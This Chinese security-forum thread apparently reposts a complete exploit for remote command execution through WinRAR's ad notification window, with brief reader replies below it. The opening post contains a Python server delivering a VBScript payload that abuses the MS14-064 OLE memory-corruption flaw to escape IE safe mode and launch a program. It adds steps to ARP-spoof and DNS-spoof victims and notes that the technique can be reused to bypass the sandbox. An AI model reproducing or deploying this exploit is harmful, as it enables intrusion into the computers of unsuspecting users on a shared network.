查看: 121793|回复: 585

继SFX漏洞之后又一枚“漏洞”

[复制链接]
  • TA的每日心情

    2015-10-22 03:08
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2015-10-17 22:03:38 | 显示全部楼层 |阅读模式
    exp:
    [AppleScript] 纯文本查看 复制代码
        #!/usr/bin/python -w
        # Title : WinRar Expired Notification - OLE Remote Command Execution
        # Date : 30/09/2015
        # Author : R-73eN
        # Tested on : Windows Xp SP3 with WinRAR 5.21
        # This exploits a vulnerability in the implementation of showing ads.
        # When a user opens any WINRAR file sometimes
        # A window with Expired Notification title loads http://www.win-rar.com/notifier/
        # reminding user to buy winrar to remove ads.
        # Since this uses a http connection we can use Man In The Middle attack
        # to gain Remote Code Execution
        #
        # Triggering the vulnerability
        # 1) Run this python script.
        # 2) arpspoof the target
        # 3) dnsspoof www.win-rar.com to point to your IP
        # 4) Wait for the victim to open WinRar files.
        #
        # Video :  https://youtu.be/h976wFlHGw4
        #
        # i hope this time the "great security researcher" Mohammad Reza Espargham
        # me[at]reza[dot]es , reza.espargham[at]gmail[dot]com doesnt steals again my exploit .....
        #
        # http://0day.today/exploit/description/24292 My exploit publishied in 25/09/2015
        # http://0day.today/exploit/description/24296 same exploit written in perl publishied in 26/09/2015
        #
        #
        #
          
        banner = ""
        banner +="  ___        __        ____                 _    _  \n"
        banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
        banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
        banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
        banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
        print banner
        print " [+] WinRar (Free Version) - Remote Command Execution [+]\n"
        import socket
          
        CRLF = "\r\n"
        #OLE command execution
        exploit = """<html>
        <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
        <head>
        </head>
        <body>
           
        <SCRIPT LANGUAGE="VBScript">
          
        function runmumaa()
        On Error Resume Next
        set shell=createobject("Shell.Application")
        shell.ShellExecute "calc.exe", "runas", 0
        end function
        </script>
           
        <SCRIPT LANGUAGE="VBScript">
           
        dim   aa()
        dim   ab()
        dim   a0
        dim   a1
        dim   a2
        dim   a3
        dim   win9x
        dim   intVersion
        dim   rnda
        dim   funclass
        dim   myarray
           
        Begin()
           
        function Begin()
          On Error Resume Next
          info=Navigator.UserAgent
           
          if(instr(info,"Win64")>0)   then
             exit   function
          end if
           
          if (instr(info,"MSIE")>0)   then
                     intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
          else
             exit   function  
                       
          end if
           
          win9x=0
           
          BeginInit()
          If Create()=True Then
             myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
             myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
           
             if(intVersion<4) then
                 document.write("<br> IE")
                 document.write(intVersion)
                 runshellcode()                    
             else  
                  setnotsafemode()
             end if
          end if
        end function
           
        function BeginInit()
           Randomize()
           redim aa(5)
           redim ab(5)
           a0=13+17*rnd(6)
           a3=7+3*rnd(5)
        end function
           
        function Create()
          On Error Resume Next
          dim i
          Create=False
          For i = 0 To 400
            If Over()=True Then
               Create=True
               Exit For
            End If
          Next
        end function
           
        sub testaa()
        end sub
           
        function mydata()
            On Error Resume Next
             i=testaa
             i=null
             redim  Preserve aa(a2)  
             
             ab(0)=0
             aa(a1)=i
             ab(0)=6.36598737437801E-314
           
             aa(a1+2)=myarray
             ab(2)=1.74088534731324E-310  
             mydata=aa(a1)
             redim  Preserve aa(a0)  
        end function
           
           
        function setnotsafemode()
            On Error Resume Next
            i=mydata()  
            i=rum(i+8)
            i=rum(i+16)
            j=rum(i+&h134)  
            for k=0 to &h60 step 4
                j=rum(i+&h120+k)
                if(j=14) then
                      j=0         
                      redim  Preserve aa(a2)            
             aa(a1+2)(i+&h11c+k)=ab(4)
                      redim  Preserve aa(a0)  
           
             j=0
                      j=rum(i+&h120+k)   
                    
                       Exit for
                   end if
           
            next
            ab(2)=1.69759663316747E-313
            runmumaa()
        end function
           
        function Over()
            On Error Resume Next
            dim type1,type2,type3
            Over=False
            a0=a0+a3
            a1=a0+2
            a2=a0+&h8000000
             
            redim  Preserve aa(a0)
            redim   ab(a0)     
             
            redim  Preserve aa(a2)
             
            type1=1
            ab(0)=1.123456789012345678901234567890
            aa(a0)=10
                    
            If(IsObject(aa(a1-1)) = False) Then
               if(intVersion<4) then
                   mem=cint(a0+1)*16            
                   j=vartype(aa(a1-1))
                   if((j=mem+4) or (j*8=mem+8)) then
                      if(vartype(aa(a1-1))<>0)  Then   
                         If(IsObject(aa(a1)) = False ) Then            
                           type1=VarType(aa(a1))
                         end if               
                      end if
                   else
                     redim  Preserve aa(a0)
                     exit  function
           
                   end if
                else
                   if(vartype(aa(a1-1))<>0)  Then   
                      If(IsObject(aa(a1)) = False ) Then
                          type1=VarType(aa(a1))
                      end if               
                    end if
                end if
            end if
                         
              
            If(type1=&h2f66) Then         
                  Over=True      
            End If  
            If(type1=&hB9AD) Then
                  Over=True
                  win9x=1
            End If  
           
            redim  Preserve aa(a0)         
                   
        end function
           
        function rum(add)
            On Error Resume Next
            redim  Preserve aa(a2)  
             
            ab(0)=0   
            aa(a1)=add+4     
            ab(0)=1.69759663316747E-313      
            rum=lenb(aa(a1))  
              
            ab(0)=0
            redim  Preserve aa(a0)
        end function
           
        </script>
           
        </body>
        </html>"""
          
        response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        host = raw_input(" Enter Local IP: ")
        server_address = (host, 8080)
        sock.bind(server_address)
        print "\n[+] Server started " + host +  " [+]"
        sock.listen(1)
        print "\n[+] Waiting for request . . . [+]"
        print "\n[+] Arpspoof target , and make win-rar.com to point to your IP [+]"
        connection, client_address = sock.accept()
        while True:
            connection.recv(2048)
            print "[+] Got request , sending exploit . . .[+]"
            connection.send(exploit)
            print "[+] Exploit sent , A calc should pop up . .  [+]"
            print "\nhttps://www.infogen.al/\n"
            exit(0)
    
                #  0day.today [2015-10-15]  #


    保存为python脚本
    arpspoof目标主机
    再dns欺骗目标主机
    目标主机打开winrar即可触发
    ↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓继续↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
    可能有些朋友注意到了。里面用到了14年一个漏洞
    ms14-064漏洞
    所以这个触发条件
    1:在局域网可劫持环境
    2:没打ms14-064补丁
    -------------------------------------------------------------------------
    当然,为什么这样做。其实涉及到一个沙箱机制
    而这样  恰恰就绕过了这个沙箱  导致打开直接触发
    当然了 当有类似IE漏洞出现 同样可以利用这个来绕过沙箱

    原帖地址:http://www.sadboy.org/forum.php?mod=viewthread&tid=418&extra=
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-10-18 08:43:59 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-10-19 20:45:15 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-10-20 00:14:18 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-4 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2015-10-24 08:23:01 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-24 10:52
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-10-26 11:12:34 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-10-27 19:55:17 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-10-27 21:48:56 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-10-28 00:23:01 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-10-28 04:54:21 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 18:02 , Processed in 0.027104 second(s), 11 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部